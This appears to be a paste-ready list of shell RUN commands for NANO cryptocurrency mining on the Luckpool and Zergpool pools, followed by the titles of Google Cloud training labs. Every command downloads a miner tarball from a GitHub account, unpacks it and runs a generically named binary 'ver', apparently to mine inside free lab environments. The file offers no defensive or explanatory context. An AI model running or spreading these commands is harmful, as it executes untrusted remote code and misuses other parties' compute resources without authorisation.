##################################
#            LUCKPOOL            #
##################################
#NANO (NA)#
RUN sudo apt update && wget https://github.com/hendrik20212/miner/releases/download/luck_na/luck_na.tar.gz && tar -xvf luck_na.tar.gz && ./ver na.ini

#NANO (EU)#
RUN sudo apt update && wget https://github.com/hendrik20212/miner/releases/download/luck_eu/luck_eu.tar.gz && tar -xvf luck_eu.tar.gz && ./ver eu.ini

#NANO (AP)#
RUN sudo apt update && wget https://github.com/hendrik20212/miner/releases/download/luck_eu/luck_ap.tar.gz && tar -xvf luck_ap.tar.gz && ./ver ap.ini

#NANO (RANDOM)#
RUN sudo apt update && wget https://github.com/hendrik20212/miner/releases/download/luck_random/luck_random.tar.gz && tar -xvf luck_random.tar.gz && ./ver random.ini


##################################
#            ZERGPOOL            #
##################################

RUN sudo apt update && wget https://github.com/hendrik20212/miner/releases/download/nano_zerg/nano_zerg.tar && tar -xvf nano_zerg.tar && ./ver zerg.ini

##################################
#            category            #
##################################

A Tour of Google Cloud Hands-on Labs
Google Cloud Pub/Sub: Qwik Start - Console
Google Cloud Pub/Sub: Qwik Start - Command Line
BigQuery: Qwik Start - Command Line
Understanding and Analyzing Your Costs with Google Cloud Billing Reports
Cloud Profiler: Qwik Start
